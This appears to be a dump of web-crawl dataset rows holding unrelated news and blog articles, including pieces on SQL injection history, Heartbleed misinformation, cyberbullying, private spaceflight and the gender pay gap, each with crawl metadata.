text stringlengths 234 589k | id stringlengths 47 47 | dump stringclasses 62 values | url stringlengths 16 734 | date stringlengths 20 20 ⌀ | file_path stringlengths 109 155 | language stringclasses 1 value | language_score float64 0.65 1 | token_count int64 57 124k | score float64 2.52 4.91 | int_score int64 3 5 |
|---|---|---|---|---|---|---|---|---|---|---|
But can Ocado’s new Code for Life tool give a helping hand?
With just six weeks until the new computing curriculum is introduced in UK schools, research has revealed that British primary school teachers are not fully prepared to teach their pupils how to code.
The poll of 250 English primary school teachers also reveals how 73% feel they have not been given the necessary resources – such as access to sufficient hardware, resources and training – to teach the new Computing curriculum from this September.
To help ready the teachers, Ocado Technology has launched an initiative called Code for Life. Ocado claims Code for Life will help equip pupils with the ‘skills needed to revolutionise the industries of tomorrow’.
Paul Clarke, director of technology at Ocado, said: "As a technology company at its core, Ocado relies on recruiting a constant stream of the brightest and best software engineers and other IT specialists to fuel its continued growth and disruptive innovation.
"We wanted to find a way to give something back by investing in the next generation of computer scientists, while hopefully increasing the number of girls selecting technology subjects.
At the hear of Ocado’s Code for Life tool is the Rapid Router web app. It aims to highlight the everyday application of coding while helping teachers meet the requirements of the new curriculum. It forms the first in a series of educational resources being created by Ocado Technology based on real life challenges within its business to inspire young people to take up a career in computer science.
It will help pupils form a solid foundation to progress to the next level of coding by providing a seamless transition from Blockly, an easy-to-use visual programming language, to Python, a more complex, widely-used programming language. The Python extension will be available later in the academic year in an updated version of the web app, enabling children of mixed abilities and ages to tackle the same problem at different levels.
Paulina Koch, Ocado technology intern, said: "I’ve been working with developers from across Ocado Technology who’ve volunteered to build this resource after work and at weekends. I’ve loved having the opportunity to work with teachers and pupils to ensure the app delivers exactly what they need. Knowing it will be used by thousands of pupils around the country to gain skills that will benefit their future is a really exciting prospect." | <urn:uuid:3ee914a4-7fd2-4a6e-ae74-0e5735d96ce6> | CC-MAIN-2017-04 | http://www.cbronline.com/news/social-media/british-teachers-are-not-prepared-to-teach-coding-4322259 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282631.80/warc/CC-MAIN-20170116095122-00492-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.942479 | 490 | 2.734375 | 3 |
Ever since the advent of the computer, there have always been people trying to hack them. William D. Mathews of MIT discovered a flaw in the Multics CTSS password file on the IBM 7094 in 1965; John T. Draper ("Captain Crunch") discovered a cereal toy whistle could provide free phone calls around 1971; The Chaos Computer Club, the Cult of the Dead Cow, 2600, the infamous Kevin Mitnick, even computing godfather Alan Turing and his World War II German Enigma-cipher busting Bombe, all and more have participated in hacking computers for as long as computers have existed.
Through the 1980s and 1990s, the world began to see the advent of the personal computer, the internet, and the world wide web. Telephone lines in millions of homes began screaming with the ear-piercing tones of dial up connections. AOL, CompuServe, Juno, and more began providing home users with information portals and gateways to the web. The information age was born; as was the age of information security (and, indeed, insecurity).
The (In)Security Watchmen - OWASP and Others
In December 2001, the Open Web Application Security Project (OWASP) was established as an international not-for-profit organization aimed at web security discussions and enhancements. For practically their entire existence, OWASP has kept track of perhaps every type of hack that could be done. Everything from social engineering, poor authentication systems, cross-site scripting, SQL injection, general software vulnerabilities, and more, OWASP kept track and encouraged the web community to continually secure everything as best as possible. As with the growth of the world wide web, things came and went, and with the efforts of OWASP and its participants the hacks that were popular were no exception. However, of all types of security intrusions, almost the only one that constantly and consistently remained in the top ten were injections (usually exclusively database SQL).
An injection is defined by OWASP as "when untrusted data is sent to an interpreter as part of a command or query." Typically, this grants an attacker unauthorized access to data within a database through a web application, or grants them the ability to insert new or alter pre-existing data. This is done because, quite simply, a web application uses the user input to directly insert it into a database query without any type of sanitization.
Immediately, one thinks, Why would anyone allow unsanitized data to enter a database query? Indeed, if we had an answer for this question we would probably be receiving billion-dollar U.S. Department of Defense contracts right now.
Interlude: What is a SQL Injection?
We want to pause before we continue further and ensure you, our treasured reader, understands what an SQL injection is and the technical aspect behind it. For purposes of brevity and focus, we will assume from here on that you understand the concept of a SQL injection, how it works, and basic ways to prevent it.
If not, first read our article What you need to know about SQL Injection and keep an eye out for our future publications, as we continue to look into this constant security problem. It is important that you understand the technical side behind a SQL injection, as it helps to highlight the simplicity and, indeed, the absurdity of the repetition of this security vulnerability.
Resume Play: A History Lesson about SQL Injection
For as long as relational databases have existed, so too have SQL injection attack vectors. Since 1999, the Common Vulnerabilities and Exposures dictionary has existed to keep track of and alert consumers and developers alike of known software vulnerabilities. Since 2003, SQL injections have remained in the top 10 list of CVE vulnerabilities; 3,260 vulnerabilities between 2003 and 2011.
In 2012 a representative of Barclaycard claimed that 97% of data breaches are a result of SQL injections. In late 2011 and through early 2012, i.e. in only one month, over one million web pages were affected by the Lilupophilupop SQL injection attack. The year of 2008 saw an incredible economic disruption as a result of SQL injections. Even the official United Nations website in 2010 fell victim to a SQL injection attack.
All these stats (excluding, of course, the CVE count) are all within the past three years. Just three years. It is indeed absolutely no surprise that in 2011 the United States Department of Homeland Security, Mitre, and SANS institute all named SQL injections as the number one most dangerous security vulnerability. So why, after over 14 years, it is still a number one seemingly unfixable vulnerability?
Low Hanging Fruit Vulnerabilities, Or: By Blunder We Learn ... Or Not
In a recent study at Goldsmiths University of London, a group of researchers came to the conclusion that our brains are hardwired such that we as humans just do not (easily) learn from our mistakes. Perhaps it is simply that developers see and are even fully cognizant of the faults in developing software, but they are mentally incapable of progressing past those recurring gaffes. Perhaps they are not seeing the proverbial forest for the trees or, specifically, they understand the technical details but not the big picture of applying that knowledge.
As far as low hanging fruit goes, SQL injections present themselves as the most likely guarantee an attacker has of easily gaining illegitimate access to a website or other SQL-backed system, simply based on the probability of success, if 14 years of historical statistics are to be believed. This is primarily because of the most obvious problem: We are still using relational SQL databases.
Were we to use NoSQL database systems such as MongoDB or CouchDB, none of these attacks would ever happen, or at least nowhere near as easily and commonplace as SQL injections. And that is not to say that NoSQL is completely and one hundred percent safe, but rather that it would immediately solve the problem of SQL injections.
But that is not the real cause, nor even a reasonably viable solution. The real reason lies in the fact that software and web application developers do indeed seem to suffer from the University of London's conclusion, that humans cannot easily learn and adapt once they (or, by observation, others) mess up. It also probably does not help that the easiest and most common information for integrating relational SQL databases with common languages, such as PHP, almost never provide the proper and most safe methods of integration, so perhaps some of the blame also lies in a near-complete lack of valuable educational material. Combine these with over-worked developers granted unreasonable deadlines or requirements, and it makes for a wicked trifecta of low-hanging fruit vulnerabilities.
Minimal Effort, Easy Reward; Exploiting a "Low Hanging Fruit" Vulnerability
By comparison, a Distributed Denial of Service attack (DDoS) requires careful coordination and leveraging hundreds to tens of thousands of compromised systems to carry out such an attack. Whereas an SQL injection attack can be accomplished on a single computer with patience, trial and error, some ingenuity, and a little luck. It really does not take much skill at all to complete a SQL injection attack. In fact, a script kiddie can do so with absolutely no understanding of SQL injections whatsoever; by using any of the free available tools. They truly are that easy.
Perhaps some SQL injection attacks result from lazy development or malpractices, but in reality, there are three big commonly repeated mistakes that allow SQL injections to occur. They include the following:
Ignorance of the Least Privilege principle
Quite simple, yet frequently ignored, this principle simply states that a user, process, or other entity shall have only the least required privileges necessary to complete its tasks. For example, a log database table does not need DELETE or UPDATE privileges, and yet database administrators commonly grant all privileges possible to a service rather than tailor-fit the permissions to exactly only what is needed.
Conglomeration of Sensitive Data
There is no reason to keep credit card data in the same database as your news articles. There is also no reason to store passwords in plaintext or with poor hashing techniques. If you segment and distribute your data, then your database and its contents becomes a far less valuable target. Would you keep all your belongings in your home, or would you keep some in your safe deposit box?
Blindly Trusting Unsanitized User Input
This is why SQL injections happen. When user input is not sanitized, an attacker has the ability to complete a SQL injection attack, amplified by the aforementioned two points. Once an attacker gains access via unsanitized input, availability of sensitive data and unlimited privileges give them everything they could ever want to wreak havoc.
That is it. Just those three simple problems that have caused over one million web pages in under a month to become compromised, including the United Nations' and several other high profile websites, have consistently kept SQL injections in OWASP's top ten list. It is almost absurd, with how simple these three problems are, that SQL injections keep happening. So what can developers do?
Later in our series of SQL injection articles, we will go over more technical details of a SQL injection attack and how to protect against them. But for now, the most important point we can stress is that developers and systems administrators do not fall prey to these three problems we have mentioned. Developers need to ensure they implement the least privilege necessary for a web application's needs, segregate or encrypt data such that a database becomes a far less valuable target, and, most importantly, always sanitize user input! These are incredibly simple techniques that, if applied as consistently as SQL injections rank in the top ten list, can potentially eliminate SQL injections from that top ten list for the first time since it was created.
Automatically Detect SQL Injection Vulnerabilities in your Web Applications
One easy and quick way to check if your websites and web applications are vulnerable to SQL Injection is by scanning them with an automated web application security scanner such as Netsparker.
Netsparker is a false positive free web application security scanner that can be used to identify web application vulnerabilities such as SQL Injection and Cross-site scripting in your web applications and websites. Download the trial version of Netsparker to find out if your websites are vulnerable or check out the Netsparker product page for more information. | <urn:uuid:b8b5555e-3ce1-42cb-8184-1917d95c176a> | CC-MAIN-2017-04 | https://www.netsparker.com/blog/web-security/sql-injection-vulnerability-history/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280319.10/warc/CC-MAIN-20170116095120-00126-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.949605 | 2,138 | 2.703125 | 3 |
Following NASAs LeadBy Larry Dignan | Posted 2005-08-31 Email Print
The UPS Brown Voyager? It could happen if private companies take over low-earth space travel and free up NASA to shoot for the stars.
Meyers hopes to use NASA's suppliers to build what would be a second-generation space shuttle to ferry space-station components, cargo and people into space. The company's shuttle—pending $5 billion to $7 billion in funding—would be built on NASA's work on the Delta Clipper, an experimental vehicle shelved in July 1997, and the X-33, which was scrapped in March 2001.
"The problem with the shuttle was that it was a 30-year prototype," Meyers says. "There were never second and third generations that improved on the first shuttle."
Clint Wallington, a professor at the Rochester Institute of Technology, says it remains to be seen whether there's a payoff from transferring NASA's knowledge of astronaut training, supplier contracts and operating launch facilities.
"You can transfer it all [to the private sector], but at what cost?" Wallington says. "You can give away the launch facilities and everything, and it could still take $250 million to do a launch. If you get seven passengers paying $20 million each, you're still [more than] $100 million short."
Challenge:Making a business case
Solution:Push tourism. Find multiple
According to Beichman, engineering a commercial manned space flight is nothing compared to making a profit. "It's not obvious where the money is going to be made," he says.
Will Whitehorn, president of Virgin Galactic, British entrepreneur Richard Branson's effort to launch space tourism, says business cases will emerge. In July, Virgin Galactic and Scaled Composites, a Mojave, Calif.-based aerospace design company, announced a joint venture to build a spaceship that could take two pilots and seven passengers into a sub-orbital flight (minimum of 62 miles above Earth). The service, initially targeted for 2008, will cost $200,000 a person for a nearly three-hour trip after three days of training.
Space travel is expensive, but NASA has figured out some ways to get customized systems at a lower cost. See if the approach makes sense for you in: Custom Software on the Cheap"In five to six years, we hope to get that down to $100,000," Whitehorn says.
Whitehorn envisions a trip where passengers can see Earth at the edge of space, float around the cabin and see some stars along the way.
Virgin's partner, Scaled Composites founder Burt Rutan, built SpaceShipOne, which in October 2004 reached a height of 69.6 miles to collect the $10 million Ansari X Prize, an award for the first spacecraft to reach 328,000 feet twice within 14 days.
Next up: Develop SpaceShipTwo, which will carry people and payload for Virgin Galactic, and then build SpaceShipThree, which will be an orbiting craft, according to Whitehorn. | <urn:uuid:1f9ee354-4ba9-49e7-b52a-488cac4195ef> | CC-MAIN-2017-04 | http://www.baselinemag.com/c/a/Business-Intelligence/Should-NASA-Open-LowOrbit-Space-to-Business/1 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285244.23/warc/CC-MAIN-20170116095125-00244-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.949305 | 631 | 2.71875 | 3 |
Megan Meier was just twelve years old when the events began that would ultimately lead to her death. Like many teenagers, Megan had accounts on common social networks, including MySpace, where she first met “Josh Evans”. Ostensibly a sixteen-year old boy, “Josh” was actually an accumulation of Sarah, an old friend of Megan’s, Sarah’s mother, Lori Drew, and Ashley, a teenage employee of Drew’s. Megan and “Josh” became online friends, and her family were pleased that she seemed generally happier. However, on Monday, 16th of October, 2006, “Josh” sent a message to Megan stating that he no longer wished to continue their friendship. “The world would be a better place without you”, he claimed. Some of the private messages Megan had sent during the course of their online acquaintanceship were posted publicly, and defamatory bulletins were written about her and shared with other members of the site.
Shortly after the friendship came to an end, Megan was found hanged in her bedroom closet.
What moves people to do such things? How big a problem is cyberbullying? And what, if anything, can be done about it?
Bullying is nothing new in our society. In schools and workplaces around the world, some individuals are victimised by people who gain self-validation by bringing others down. With the invention of the internet, however, bullying has taken on a whole new dimension. Now it doesn’t stop in the schoolyard or on the walk home from work; it carries on in your bedroom, sits on your sofa with you when you’re holding your smartphone, and even takes place in your absence, only to be discovered when you next log on.
But isn’t it different from “normal” bullying? Surely, some argue, it must be possible for people to just not have a social networking account, or to change their email address, or just to read a book in the evening instead of turning on the computer?
Perhaps. But in today’s society, technology is everywhere, and setting yourself apart from it can put you at a disadvantage both personally and professionally. For many people today, the line between online and offline life isn’t just blurred, it’s non-existent. Your smartphone alarm wakes you up, and you check your email before you get out of bed. On the way to work, your friends ping messages at you through social networking applications. At work, your inbox fills with business and personal messages. When you go home, you turn on your connected TV and watch it whilst absent-mindedly scrolling through your favourite websites. In this kind of world, cyberbullying isn’t confined to some other realm; it’s going everywhere with you, all the time. And cyberbullying is notoriously difficult to investigate; for one thing, legal jurisdiction in cybercrime is not always easily defined. Cyberbullies may go to great lengths to protect their online anonymity, using public computers and anonymous email resenders to ensure that their own name is not tied to any of the acts.
Carole Phillips is a trustee for BulliesOut, a charity that works to combat bullying both online and offline. She is also a child protection officer who teaches children about Internet safety. We asked her how large a problem cyberbullying really is in today’s society.
“The media attention given to the tragic cases such as the suicide of Hannah Smith and Daniel Perry is only the tip of the iceberg. Ask any school today and they will tell you that at the root cause of any falling out with friends or any bullying problem, you will soon uncover that [social networking sites] are at the centre of the dispute.
Young people today are known as digital natives because they have been raised on the emergence of technology and are very adept at getting to grips with anything new that would take the older generation a little longer to grasp. And therein lies the problem: unless we are professionals who work with young people or in the field in which social media is part of our world too, there has not been the same level of understanding of how social media works and impacts on young people’s lives. With no boundaries or little understanding about ‘how things work’, young people are playing in a lawless society online without the emotional capacity or maturity to deal with issues when things go wrong or an adult to steer them in the right direction.”
A sobering thought. So what can be done? Phillips elaborates:
“In order to move forward and equip people who use social media with the tools to deal with it when things get out of hand, adults such as educators, social workers, youth workers and most importantly parents, need to get to grips with exactly what their children are exposed to, instill levels of morality in them and remind young people over and over again that they should not act online in a way that they would not act in the real world. If you were made to say nasty, vile comments to someone’s face as opposed to someone online, I think you would think twice as you no longer have the veil of anonymity to hide behind.
Schools have a big role to play. Educate all staff on social media, not just ICT teachers or child protection officers; make it a whole school approach and learn how to recognise when things are not going well. Engage parents in training and work together with them and share the responsibility of working together to safeguard young people. Most importantly, teach young people about the consequences of using social media in a negative way as your digital footprint is there forever and you leave a trail behind you that you may not want people to see not only now, but in years to come, be it your parents, families and friends but also potential future employers. The message I would say to all users is act responsibility as you cannot use technology as a way to behave in a way you would not if it did not exist.”
It is evident that cyberbullying is a growing issue in today’s society. Anonymity online can be misused to threaten and victimise others, particularly young people who may spend a lot of time on the Internet and feel high levels of pressure to fit in with their peer group. As digital forensics professionals, the best we can do reactively is to ensure our investigations are thorough and adept. But as Phillips points out, the way to prevention is through education; people need to understand more about the repercussions of their own actions online, and know what to do if they or someone they know are feeling threatened by another party’s online behaviour.
If you are concerned about issues related to cyberbullying, the following organisations can help: | <urn:uuid:b34d3f2b-ab96-4b7a-a6f2-a33e7224c3e7> | CC-MAIN-2017-04 | https://articles.forensicfocus.com/2013/08/22/cyberbullying-a-growing-concern-in-a-connected-society/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281426.63/warc/CC-MAIN-20170116095121-00273-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.969824 | 1,404 | 2.84375 | 3 |
Orbital Sciences this morning successfully launched its Antares rocket carrying the company's Cygnus cargo spacecraft on a demonstration mission to resupply the International Space Station.
The launch represents the second major private unmanned space system - but the first launched from NASA's Wallops Island, Va. facility -- to successfully blast into space. The company joins Space Exploration Technologies (Space X) with its Falcon 9 rocket and Dragon spacecraft which launched the first successful private mission in May 2012. Unlike the reusable Dragon however, Cygnus will not make a trip back to Earth, it will be discharged from the ISS and sent to burn up in the Earth's atmosphere.
[RELATED: The SpaceX blast into history]
According to NASA, traveling 17,500 mph in Earth's orbit, Cygnus successfully deployed its solar arrays and is on its way to rendezvous with the space station Sunday, Sept. 22. The spacecraft is set to deliver about 1,300 pounds (589 kilograms) of cargo, including food and clothing, to the Expedition 37 crew, who will grapple and attach the capsule using the ISS' robotic arm.
But first it will have to prove itself so over the next few days Cygnus will perform a series of maneuvers to test its systems, ensuring it can safely enter the so-called "keep-out sphere" of the space station, a 656-foot (200-meter) radius surrounding the station.
This demonstration flight is the final milestone in Orbital's Commercial Orbital Transportation Services (COTS) joint research and development initiative with NASA. Under the COTS program, which began in 2008, NASA and Orbital developed Cygnus, which meets the stringent human-rated safety requirements for ISS operations. Orbital also privately developed the Antares launch vehicle to provide low-cost, reliable access to space for medium-class payloads, Orbital stated.
Pending the successful completion of the COTS program, Orbital will begin regularly scheduled cargo delivery missions to the ISS under its $1.9 billion Commercial Resupply Services (CRS) contract with NASA. Under the CRS contract, Orbital will deliver approximately 20,000 kilograms of net cargo to the ISS over eight missions through 2016. For these missions, NASA will manifest a variety of essential items based on ISS program needs, including food, clothing, crew supplies, spare parts and equipment, and scientific experiments.
Check out these other hot stories: | <urn:uuid:3be78031-2341-4648-bab4-9c2c59ba2f76> | CC-MAIN-2017-04 | http://www.networkworld.com/article/2225396/data-center/orbital-sciences-just-made-private-space-arena-way-more-interesting.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281492.97/warc/CC-MAIN-20170116095121-00117-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.922092 | 490 | 2.75 | 3 |
Reducted Data Footprint
1. Reduced data footprint
In recent years, column-oriented databases have been noted by many as the preferred architecture for high-volume analytics. A column-oriented database stores data column by column instead of row by row. There are many advantages to this. Most analytic queries only involve a subset of the columns in a table, so a column-oriented database focuses on retrieving only the data that is required. This speeds queries and reduces disk I/O and computer resources.
Furthermore, these databases enable efficient data compression because each column stores a single data type, as opposed to rows that typically contain several data types. Compression can be optimized for each particular data type, reducing the amount of storage needed for the database. Column orientation also greatly accelerates query processing, which significantly increases the concurrent queries a server can process.
There are a variety of column-oriented solutions on the market. Some duplicate data and require as large a hardware footprint as traditional row-based systems. Others have combined the column basis with other technologies, which eliminates the need for data duplication. This means that users don't need as many servers or as much storage to analyze the same volume of data.
For example, some column-oriented databases can achieve compression results ranging from 10:1 (a 10TB database becomes a 1TB database) to more than 40:1, depending on the data. With this level of compression, a distributed server environment can be reduced by a factor of 20 to 50 times and be brought down to a single box-slashing heat, power consumption and carbon emissions.
Virtual data marts are also coming on the scene, leveraging Enterprise Information Integration (EII) technologies to create specialized views of data sets without the need for physical storage. The downside to this approach is that complex queries can be sluggish, which can be a problem when analytic needs call for close to real-time insight.
Open-source software takes efficient resource utilization a step further as it typically does not require proprietary hardware or specialized appliances. | <urn:uuid:31e82e86-f359-419a-9a00-70eb684bf427> | CC-MAIN-2017-04 | http://www.eweek.com/c/a/Data-Storage/How-to-Achieve-Greener-Data-Storage-and-Analysis/1 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280133.2/warc/CC-MAIN-20170116095120-00329-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.922064 | 413 | 2.65625 | 3 |
The Heartbleed vulnerability has created a massive news cycle, and generated technical risk-based discussions that might actually do some good. But some of these discussions boggle the mind, spreading misinformation in order to generate clicks or sales.
When security issues hit the mass media, such as Heartbleed, there is a good deal of Fear, Uncertainty, and Doubt – better known as FUD – that gets promoted on the airwaves and in print.
"Police say Canadian man used Heartbleed virus to steal personal info
"Heartbleed virus: Changing your password may not eliminate risk"
These headlines promote FUD because Heartbleed isn't a virus. Heartbleed is a vulnerability in libssl (the portion of OpenSSL supporting TLS). They're just two examples, but several news agencies have allowed the term virus to be attached to Heartbleed. That's unfortunate. There is no way someone can send you a file and infect you with Heartbleed.
In the business world, issues like Heartbleed can cause headaches and panicked discussions, as business leaders attempt to understand the bigger picture. This leaves some security professionals caught in an endless loop of explaining the problem while removing false notions.
The latest false notion Heartbleed was pitched to me earlier this month.
"Many organizations were not ready for Heartbleed, and sadly, many will likely not be ready for its mutations. Vulnerabilities like Heartbleed take advantage of an overreach flaw in the SSL heartbeat protocol and the truth is that there will be unknown mutations that might force you to reactively patch your devices, effecting the network or server's performance, privacy, and trust." - Chris Chapman, Technical Manager at Spirent
There will be no mutations of Heartbleed. This is just as good as calling it a virus. The reason that there can be no mutation is simple, Heartbleed is a single vulnerability, that impacts a subset of libssl deployments.
Those who use a vulnerable version of OpenSSL with the heartbeat option enabled were in trouble, those who don't use OpenSSL, or who used it without the heartbeat option, were not impacted by this flaw.
Spirent also listed five items of note as related to Heartbleed and the products / services they are trying to promote. I've listed all five below, with additional commentary.
5. Web servers may still be vulnerable to Heartbleed.
Rapidly deployed and inadequately tested security patches from the system vendors means that many devices and networks may still be susceptible to Heartbleed and its variations.
The patches and mitigation steps needed to address the Heartbleed vulnerability were documented and tested before being released to the public. Administrators were encouraged to weigh their options and to patch as appropriate. Most did, but others didn't need to patch as they didn't use OpenSSL, or they recompiled and disabled heartbeat until they could investigate further.
There were problems with some of the fixes released by infrastructure firms, but those were quickly addressed and no one suffered because of them. At best, Heartbleed patching caused short bursts of downtime that fall well within most SLAs.
In fact, the aftermath of the Heartbleed issue has led to additional development, including a fork of the OpenSSL project. Even better, the Linux Foundation has secured resources from the Web's largest firms in order to address security in various open source projects; the first recipient will be OpenSSL itself.
4. Heartbleed will mutate.
Heartbleed will likely mutate into hundreds or even thousands of variants. Software patches may not mitigate upcoming attacks.
No. Again, Heartbleed cannot mutate. This will not happen. Your server or product is either vulnerable to Heartbleed, or it isn't. End of story. If it is vulnerable, patch it. Patching against Heartbleed is exactly how you mitigate against such a vulnerability.
3. Multiple software patches can be a weak link.
Most organizations will have multiple devices requiring patches that may not all work together and inadvertently expose the network further.
2. Patches may break performance.
Urgently applied Heartbleed patches may impact network performance and quality of experience (QoE) of the IT networks.
Heartbleed doesn't have multiple patches. It is a single vulnerability; therefore it has a single patch. If the server or product is vulnerable, patch it with the proper fix from the vendor.
But again, in the security world, the majority of administrators test their patches first, widely deploy second. If something breaks, they have the ability to reverse the process. Heartbleed patching is, at its core element, no different than patching an Internet Explorer vulnerability.
1. Heartbleed-like vulnerabilities could happen in any protocol.
While Heartbleed is a SSL/TCP flaw there are other protocols such as TCP, HTTP are just as susceptible, so preparing for that eventuality is critical.
I'm assuming this is a typo. As Heartbleed impacts SSL/TLS, but using generic protocols like TCP and HTTP is a bit unfair and serves little purpose.
In response to massive criticism over the aforementioned five points, Chris Chapman published a blog clarifying his company's position.
"There are many ways of mutating attacks – the specific danger we wanted to address was technique mutation. Specifically when a pathway of attack works, malicious entities take that technique and apply it to other state machines, both close and distant to the original state machine, in an attempt to find other pathways of entry. Furthermore, variants of the technique may also attempt to gain entry. Together, these techniques of entry hunt for weaknesses in the protocol. In fact, we have already seen this happen."
Chapman cited a recent Mandiant post about how attackers exploited Heartbleed to hijack VPN sessions and bypass two-factor authentication as an example of what he's describing.
However, the VPN concentrator that Mandiant discusses was vulnerable to Heartbleed, so the criminals exploited that vulnerability and compromised VPN accounts. How did the company address the issue? They patched the VPN concentrator against the Heartbleed flaw.
In concluding his clarification, Chapman added:
"These are examples of how hackers are using the Heartbleed techniques in a slightly different way to successfully find new holes. There is also no reason why the exact technique of Heartbleed must be static. Small or large, technique changes (mutations) could also pose a threat."
That's the problem. They're not finding new holes. They're exploiting a single hole on multiple surfaces. Heartbleed is the vulnerability, if servers and other devices are patched against it, then it's no longer an issue. | <urn:uuid:e721937c-761d-4c94-8904-b7cba4ee1c07> | CC-MAIN-2017-04 | http://www.csoonline.com/article/2148461/application-security/examining-the-heartbleed-based-fud-thats-pitched-to-the-public.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280587.1/warc/CC-MAIN-20170116095120-00081-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.947609 | 1,387 | 2.734375 | 3 |
as far as data is stored on any media, it is just a sequence of bits organized in larger entities according to the hardware architecture;
the definition of its nature is a convention according to the use You make of the data itself.
let' s make an example for 8 bits:
bit sequence 1100 0001
hexadecimal representation "c1"
numeric value 193
alphanumeric value "A"
so the fact that a sequence of bits is representing a packed decimal number can not be made into a bidirectional assumption
for example ( in hexadecimal representation )
x"000C" can be interpreted as the D.P value of zero,
or simply as a binary value of 12
All this to imply that Your request is not clear enough | <urn:uuid:f025a437-092b-46c8-856b-3d79d9e9db2c> | CC-MAIN-2017-04 | http://ibmmainframes.com/about21488.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.22/warc/CC-MAIN-20170116095120-00567-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.916841 | 162 | 2.609375 | 3 |
| ||Tea Ceremony|
Equipment For Japanese Tea Ceremony
The Kama is a container which hold water.
Mizushashi is a jug used to hold water which is used for washing. It is also used to hold water for boiling.
Kensui a container used to hold water that is used to wash the teabowls.
Chawan is a bowl.
Usuki or natsume, is a lacquer ware container for usucha or powdered tea.
Hishaku is a ladle for pouring water.
| || ||
Read about the:
Home | Research | Dictionary | Galleries | About Us | Help | <urn:uuid:4a13516d-c438-4c10-be6c-6918885ec3b4> | CC-MAIN-2017-04 | http://www.easterntea.com/ceremony/tea_equipment.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281659.81/warc/CC-MAIN-20170116095121-00383-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.761078 | 151 | 2.828125 | 3 |
Scientists at the University of Washington are working on a rocket that they say could enable astronauts to reach Mars in just 30 days.
NASA has estimated that, using current technology, a round-trip human mission to Mars would take more than four years.
In addition, such a trip would require significant amounts of very expensive chemical rocket. The launch costs alone would add up to more than $12 billion, according to the university.
A team of University of Washington researchers and engineers are building components of a nuclear fusion-powered rocket that they say could clear many of the hurdles that block deep space travel, including the long estimated travel times, the exorbitant costs and the health risks associated with spending months in a cramped space capsule.
"Using existing rocket fuels, it's nearly impossible for humans to explore much beyond Earth," said John Slough, a University of Washington research associate professor of aeronautics and astronautics. "We are hoping to get a much more powerful source of energy that could eventually make interplanetary travel commonplace."
If the research team can build components for a fusion-powered rocket, Slough said it could lead to both 30- and 90-day expeditions to Mars.
While NASA has robotic rovers working on Mars today, the space agency has long looked to build a human outpost there.
In 2004, President George W. Bush called on NASA to send humans back to the moon by 2020. He said that effort would be done to prepare for a manned-mission to Mars.
More recently, President Barack Obama formulated a new plan that calls on NASA to hire commercial companies to build so-called space taxis to ferry astronauts to and from the International Space Station.
Meanwhile, space agency is charged with building next-generation heavy-lift engines and robotics technology for use in travel to the moon, to asteroids and to Mars.
The University of Washington says its researchers have developed a plasma that is encased in its own magnetic field. Nuclear fusion occurs when the plasma is compressed at high pressure with a magnetic field.
Researchers, they reported, have had successful lab tests and now are focusing on putting all the pieces together for an overall test.
The team has created a system in which a powerful magnetic field causes large metal rings to implode around the plasma, compressing it to a fusion state, to power the rocket. The converging rings merge to form a shell that ignites the fusion, but only for a few microseconds.
The fusion reactions quickly heat and ionize the shell. This super-heated, ionized metal is ejected out of the rocket nozzle at a high velocity, the university explained. This process is repeated every minute or so, propelling the spacecraft at high speeds.
"I think everybody was pleased to see confirmation of the principal mechanism that we're using to compress the plasma," Slough said. "We hope we can interest the world with the fact that fusion isn't always 40 years away and doesn't always cost $2 billion."
The university's rocket project is funded by NASA's Innovative Advanced Concepts Program.
Sharon Gaudin covers the Internet and Web 2.0, emerging technologies, and desktop and laptop chips for Computerworld. Follow Sharon on Twitter at @sgaudin, or subscribe to Sharon's RSS feed . Her e-mail address is firstname.lastname@example.org.
Read more about emerging technologies in Computerworld's Emerging Technologies Topic Center.
This story, "NASA-backed fusion rocket aims for human Mars mission" was originally published by Computerworld. | <urn:uuid:bba57af9-c3bc-4944-b1c2-f79240665ec2> | CC-MAIN-2017-04 | http://www.itworld.com/article/2708652/hardware/nasa-backed-fusion-rocket-aims-for-human-mars-mission.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280266.9/warc/CC-MAIN-20170116095120-00017-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.951038 | 727 | 3.75 | 4 |
A deep dive into crowdsourced salary data from more than half a million employees shows that the gender pay gap is very real, and that male computer programmers make far more than their female counterparts.
The Economic Research arm of online jobs marketplace Glassdoor has issued a report titled Demystifying the Gender Pay Gap that attempts to explain why males are making so much more than females across industries and countries. While the researchers have come up with explanations for much of the pay gap in the United States, about a third of the gap is unexplained and presumed to be due to factors such as intentional or unintentional bias as well differences in pay negotiations.
Glassdoor acknowledges that its findings, based on salary and named company data, are affected by the fact that those who shared information are “online employees” vs. those from the broader workforce who might not be inclined to share such data online (thus, Glassdoor’s view of the U.S. labor force, for example, would be different than that seen in the U.S. Census).
Having said that, the findings in Glassdoor’s study are striking. It shows that women earn about 76 cents for every dollar that men earn in the United States, though if you adjust those figures to take into consideration the industry in which people work, their level of experience, where they live and so forth, the gap is greatly reduced. This adjusted gender pay gap shows women making 94.6 cents for every dollar that men earn. Glassdoor finds a similar pattern in the U.K., Australia, Germany and France (I’ll be focusing on the U.S. from here on).
Glassdoor says the biggest cause of the gender pay gap in the U.S. “is women and men sorting into different jobs or industries with varying pay.” Age is also a factor, with the gap among employees 55 or older being about twice as large as the national average of 5.4%.
The adjusted gender pay gap is largest in the U.S. in healthcare (7.2%), insurance (7.2%) and mining/metals (6.8%), and smallest aerospace/defense (2.5%), agriculture/forestry (2.5%) and biotech/pharmaceuticals (3%).
